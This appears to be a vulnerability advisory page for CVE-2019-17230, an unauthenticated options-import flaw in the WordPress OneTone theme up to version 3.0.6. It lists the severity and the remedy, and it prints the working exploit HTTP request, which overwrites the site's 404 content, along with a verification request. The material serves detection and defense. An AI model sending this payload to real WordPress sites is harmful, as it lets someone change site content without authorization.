🔙 목록으로 돌아가기

CVE-2019-17230: WordPress OneTone theme <= 3.0.6 – Unauthenticated Options Changes

TitleWordPress OneTone theme <= 3.0.6 – Unauthenticated Options Changes
Authordaffainfo
SeverityMedium
ImpactUnauthenticated attackers can modify WordPress theme options, potentially changing site content like 404 page messages to inject malicious content or alter site behavior.
RemediationUpdate the OneTone theme to version 3.0.7 or later, or switch to a different theme.
CVSS Score5.3
EPSS Score0.0849
CVE IDCVE-2019-17230
Tags cve cve2019 wordpress wp-theme wp onetone vkev vuln

🔍 Vulnerability Description

includes/theme-functions.php in the OneTone theme through 3.0.6 for WordPress allows unauthenticated options changes.

🌐 HTTP Request

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Connection: close
Content-Length: 64
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

action=onetone_options_import&options={"content_404":"n3YhnTef"}
GET /38FXZ3hY0H2IrxGeIr3qYke2QII HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Connection: close
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-17230.yaml

🦈 Packet Capture: ⬇️ Download cve-2019-17230.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A